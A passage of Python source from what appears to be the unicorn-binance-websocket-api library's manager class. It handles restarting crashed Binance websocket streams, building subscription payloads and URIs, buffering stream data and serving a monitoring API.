f"= {task}")
except SystemExit as error_code:
logger.debug(f"BinanceWebSocketApiManager._handle_task_result() - SystemExit({error_code}) raised by task "
f"= {task}")
except Exception as error_msg:
logger.critical(f"BinanceWebSocketApiManager._handle_task_result() - Exception({error_msg}) raised by task "
f"= {task}")
def _keepalive_streams(self):
"""
This method is started as a thread and is observing the streams, if neccessary it restarts a dead stream
"""
keepalive_streams_id = time.time()
self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info("BinanceWebSocketApiManager._keepalive_streams() new instance created with "
"keepalive_streams_id=" + str(keepalive_streams_id))
# threaded loop to restart crashed streams:
while self.stop_manager_request is None and \
self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
time.sleep(1)
self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
# restart streams with a restart_request (status == new)
temp_restart_requests = copy.deepcopy(self.restart_requests)
for stream_id in temp_restart_requests:
try:
# find restarts that didnt work
if self.restart_requests[stream_id]['status'] == "restarted" and \
self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
self.restart_requests[stream_id] = {'status': "new",
'initiated': None}
# restart streams with requests
if self.restart_requests[stream_id]['status'] == "new" or \
self.stream_list[stream_id]['kill_request'] is not None:
self.kill_stream(stream_id)
if self.restart_requests[stream_id]['initiated'] is None or \
self.restart_requests[stream_id]['initiated']+5 < time.time():
self.restart_requests[stream_id]['initiated'] = time.time()
thread = threading.Thread(target=self._restart_stream_thread,
args=(stream_id,),
name=f"_restart_stream_thread: stream_id={stream_id}, "
f"time={time.time()}")
thread.start()
except KeyError:
pass
sys.exit(0)
def _restart_stream(self, stream_id):
"""
This is NOT stop/start! Its purpose is to start a died stream again! Use `set_restart_request()` for stop/start!
:param stream_id: id of a stream
:type stream_id: str
:return: stream_id or False
"""
try:
if self.restart_requests[stream_id]['status'] != "new":
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
"instead!")
return False
except KeyError:
# no restart_request entry for this stream_id:
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
return False
logger.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + f"){self.get_debug_log()}")
self.restart_requests[stream_id] = {'status': "restarted"}
self.restart_requests[stream_id]['last_restart_time'] = time.time()
self.stream_list[stream_id]['status'] = "restarting"
self.stream_list[stream_id]['kill_request'] = None
self.stream_list[stream_id]['payload'] = []
loop = asyncio.new_event_loop()
self.set_socket_is_not_ready(stream_id)
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
self.stream_list[stream_id]['channels'],
self.stream_list[stream_id]['markets'],
self.stream_list[stream_id]['stream_buffer_name'],
self.stream_list[stream_id]['stream_buffer_maxlen'],
True),
name=f"_create_stream_thread: stream_id={stream_id}, time={time.time()}")
thread.start()
self.stream_threads[stream_id] = thread
while self.socket_is_ready[stream_id] is False and self.high_performance is False:
# This loop will wait till the thread and the asyncio init is ready. This avoids two possible errors as
# described here: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/131
logger.debug(f"BinanceWebSocketApiManager.create_stream({str(stream_id)}) - Waiting till new socket and "
f"asyncio is ready")
time.sleep(1)
return stream_id
def _restart_stream_thread(self, stream_id):
"""
Wait till the old socket has closed and then start it again
:param stream_id: id of a stream
:type stream_id: str
"""
logger.debug("BinanceWebSocketApiManager._restart_stream_thread(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + f"){self.get_debug_log()}")
self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
"""
Threaded method that servces the monitoring api
:param host: IP or hostname to use
:type host: str
:param port: Port to use
:type port: int
:param warn_on_update: Should the monitoring system report available updates?
:type warn_on_update: bool
"""
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
app = Flask(__name__)
@app.route('/')
@app.route('/status/')
def redirect_to_wiki():
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
"Visit https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/UNICORN-"
"Monitoring-API-Service for further information!")
return redirect("https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service", code=302)
api = Api(app)
api.add_resource(BinanceWebSocketApiRestServer,
"/status/<string:statusformat>/",
"/status/<string:statusformat>/<string:checkcommandversion>",
resource_class_kwargs={'handler_binance_websocket_api_manager': self,
'warn_on_update': warn_on_update})
try:
dispatcher = wsgi.PathInfoDispatcher({'/': app})
self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
self.monitoring_api_server.start()
except RuntimeError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
except OSError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
"""
Add received error messages from websocket endpoints to the error ringbuffer
:param error: The data to add.
:type error: string
:return: bool
"""
while len(self.ringbuffer_error) >= self.get_ringbuffer_error_max_size():
self.ringbuffer_error.pop(0)
self.ringbuffer_error.append(str(error))
return True
def add_to_ringbuffer_result(self, result):
"""
Add received result messages from websocket endpoints to the result ringbuffer
:param result: The data to add.
:type result: string
:return: bool
"""
while len(self.ringbuffer_result) >= self.get_ringbuffer_result_max_size():
self.ringbuffer_result.pop(0)
self.ringbuffer_result.append(str(result))
return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
"""
Kick back data to the
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If it is not possible to process received stream data (for example, the database is restarting, so its not
possible to save the data), you can return the data back into the stream_buffer. After a few seconds you stopped
writing data back to the stream_buffer, the BinanceWebSocketApiManager starts flushing back the data to normal
processing.
:param stream_data: the data you want to write back to the buffer
:type stream_data: raw stream_data or unicorn_fied stream data
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
with self.stream_buffer_lock:
self.stream_buffer.append(stream_data)
else:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].append(stream_data)
self.last_entry_added_to_stream_buffer = time.time()
return True
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
"""
Add signals about a stream to the
`stream_signal_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
:param signal_type: "CONNECT", "DISCONNECT" or "FIRST_RECEIVED_DATA"
:type signal_type: str
:param stream_id: id of a stream
:type stream_id: str
:param data_record: The last or first received data record
:type data_record: str or dict
:return: bool
"""
if self.enable_stream_signal_buffer:
stream_signal = {'type': signal_type,
'stream_id': stream_id,
'timestamp': time.time()}
if signal_type == "CONNECT":
# nothing to add ...
pass
elif signal_type == "DISCONNECT":
try:
stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
except KeyError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Cant determine last_received_data_record! - error_msg: {error_msg}")
stream_signal['last_received_data_record'] = None
elif signal_type == "FIRST_RECEIVED_DATA":
stream_signal['first_received_data_record'] = data_record
else:
logger.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Received invalid `signal_type`!")
return False
with self.stream_signal_buffer_lock:
self.stream_signal_buffer.append(stream_signal)
logger.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
return True
else:
return False
def add_total_received_bytes(self, size):
"""
Add received bytes to the total received bytes statistic
:param size: int value of added bytes
:type size: int
"""
with self.total_received_bytes_lock:
self.total_received_bytes += int(size)
def clear_stream_buffer(self, stream_buffer_name=False):
"""
Clear the
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
try:
self.stream_buffer.clear()
return True
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].clear()
return True
except IndexError:
return False
except KeyError:
return False
def create_payload(self, stream_id, method, channels=False, markets=False):
"""
Create the payload for subscriptions
:param stream_id: provide a stream_id
:type stream_id: str
:param method: `SUBSCRIBE` or `UNSUBSCRIBE`
:type method: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:return: payload (list) or False
"""
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
payload = []
if self.is_exchange_type("dex"):
if method == "subscribe" and channels is not False:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
symbols = []
if channel == "allMiniTickers" or \
channel == "allTickers" or \
channel == "blockheight":
add_payload["symbols"] = ["$all"]
payload.append(add_payload)
continue
if markets:
for market in markets:
if market == "allMiniTickers" or \
market == "allTickers" or \
market == "blockheight":
add_payload_from_market = {"method": method,
"topic": market,
"symbols": ["$all"]}
payload.append(add_payload_from_market)
continue
elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
else:
symbols.append(market)
try:
if self.stream_list[stream_id]["dex_user_address"] is not False:
add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
payload.append(add_payload)
except KeyError:
pass
if len(symbols) > 0:
add_payload["symbols"] = symbols
payload.append(add_payload)
elif method == "unsubscribe":
if markets:
add_payload = {"method": method}
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
markets.remove(market)
if len(markets) > 0:
add_payload["symbols"] = markets
payload.append(add_payload)
if channels:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
payload.append(add_payload)
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
elif self.is_exchange_type("cex"):
final_market = "@arr"
if markets:
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
if channels:
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
if method == "subscribe":
params = []
for channel in channels:
if "!" in channel:
params.append(channel + final_market)
continue
else:
for market in markets:
if "!" in market:
params.append(market + final_channel)
else:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
params = list(set(params))
payload = self.split_payload(params, "SUBSCRIBE")
elif method == "unsubscribe":
if markets:
params = []
try:
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel:
params.append(channel + final_market)
else:
for market in markets:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
except KeyError:
pass
if channels:
params = []
for market in self.stream_list[stream_id]['markets']:
if "!" in market:
params.append(market + final_channel)
else:
for channel in channels:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") finished ...")
return payload
def create_stream(self,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=None,
ping_timeout=None,
close_timeout=None,
stream_buffer_maxlen=None,
process_stream_data=None):
"""
Create a websocket stream
If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).
Example:
channels = ['trade', 'kline_1']
markets = ['bnbbtc', 'ethbtc']
Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1
`There is a subscriptions limit per stream!
<https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/Binance-websocket-endpoint-configuration-overview>`_
Create `!userData` streams as single streams, because its using a different endpoint and can not get combined
with other streams in a multiplexed stream!
Example CEX:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``
Isolated Margin:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``
Example DEX:
``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``
To create a multiplexed stream which includes also `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
`!bookTicker@arr` you just need to add `!bookTicker` to the channels list - dont add `arr` (cex) or `$all`
(dex) to the markets list.
Example:
``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``
But you have to add `arr` or `$all` if you want to start it as a single stream!
Example:
``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label to identify the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/design.html?highlight=close_timeout#closing-handshake>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param process_stream_data: Provide a function/method to process the received webstream data (callback). The
function will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data)` where
`stream_data` cointains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer or provided to the global callback function provided during
object instantiation! `How to read from stream_buffer!
<https://unicorn-binance-websocket-api.docs.lucit.tech/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:return: stream_id or 'False'
"""
# create a stream
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`channels` must be str, tuple, list or a set!")
return False
elif isinstance(markets, bool):
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`markets` must be str, tuple, list or a set!")
return False
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
output = output or self.output_default
close_timeout = close_timeout or self.close_timeout_default
ping_interval = ping_interval or self.ping_interval_default
ping_timeout = ping_timeout or self.ping_timeout_default
stream_id = self.get_new_uuid_id()
markets_new = []
if stream_buffer_name is True:
stream_buffer_name = stream_id
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
markets_new.append(str(market).upper())
else:
markets_new.append(str(market))
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
logger.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
+ str(stream_id))
self._add_stream_to_stream_list(stream_id,
channels,
markets_new,
stream_label,
stream_buffer_name,
symbols=symbols,
api_key=api_key,
api_secret=api_secret,
output=output,
ping_interval=ping_interval,
ping_timeout=ping_timeout,
close_timeout=close_timeout,
stream_buffer_maxlen=stream_buffer_maxlen,
process_stream_data=process_stream_data)
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}), {stream_buffer_maxlen} "
f"with stream_id={str(stream_id)} - OSError - can not create stream - "
f"error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
self.set_socket_is_not_ready(stream_id)
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
channels,
markets_new,
stream_buffer_name,
stream_buffer_maxlen,
False),
name=f"_create_stream_thread: stream_id={stream_id}, time={time.time()}")
thread.start()
self.stream_threads[stream_id] = thread
while self.socket_is_ready[stream_id] is False and self.high_performance is False:
# This loop will wait till the thread and the asyncio init is ready. This avoids two possible errors as
# described here: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/131
logger.debug(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}, {stream_buffer_maxlen}) "
f"with stream_id={str(stream_id)} - Waiting till new socket and asyncio is ready")
time.sleep(1)
return stream_id
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
"""
Create a websocket URI
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
f"or a set!")
return False
elif isinstance(markets, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
f"or a set!")
return False
payload = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if len(channels) == 1 and len(markets) == 1:
if "!userData" in channels or "!userData" in markets:
if stream_id is not False:
response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
try:
if response['code'] == -1102 or \
response['code'] == -2008 or \
response['code'] == -2014 or \
response['code'] == -2015 or \
response['code'] == -11001:
# -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
# -2008 = Invalid Api-Key ID
# -2014 = API-key format invalid
# -2015 = Invalid API-key, IP, or permissions for action
# -11001 = Isolated margin account does not exist.
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
"error code from rest client: " + str(response))
return response
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
"error code from rest client: " + str(response))
return response
except KeyError:
pass
except TypeError:
pass
if response:
try:
uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
uri_hidden = self.websocket_base_uri + "ws/" + self.replacement_text
if self.show_secrets_in_logs is True:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
else:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " +
uri_hidden)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return uri
except KeyError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
except TypeError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
"URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
return False
elif "!bookTicker" in channels or "!bookTicker" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/!bookTicker"
elif "arr" in channels or "$all" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
elif "arr" in markets or "$all" in channels:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
elif self.is_exchange_type("dex"):
if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
try:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = markets[0]
if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
"dex_user_address is not allowed to get changed anymore!")
return False
except KeyError:
pass
add_payload = {"method": "subscribe",
"topic": channels[0],
"address": markets[0]}
payload.append(add_payload)
if stream_id:
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0]
elif markets[0] != "" and channels[0] != "":
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
else:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
"URI for DEX")
return False
if self.is_exchange_type("dex"):
query = "ws"
if stream_id:
payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + str(query)
else:
query = "stream?streams="
final_market = "@arr"
market = ""
channel = ""
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
for channel in channels:
if channel == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunately Binance only stream it in a single stream socket! ./"
"Use create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
for market in markets:
if market == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunatly Binance only stream it in a single stream socket! ./"
"Use create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
if "!" in channel:
query += channel + final_market
elif "!" in market:
query += market + final_channel
else:
query += market.lower() + "@" + channel
try:
if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
sys.exit(1)
except KeyError:
pass
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
str(stream_id) + " is " + self.websocket_base_uri + str(query))
return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: str
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logger.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or get stopped, its data remains in the BinanceWebSocketApiManager till you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list you can use this method.
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
logger.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
def get_active_stream_list(self):
"""
Get a list of all active streams
:return: set or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
try:
if len(stream_list_with_active_streams) > 0:
return stream_list_with_active_streams
except KeyError:
return False
except UnboundLocalError:
return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_binance_api_status(self):
"""
`get_binance_api_status()` is obsolete and will be removed in future releases, please use `get_used_weight()`
instead!
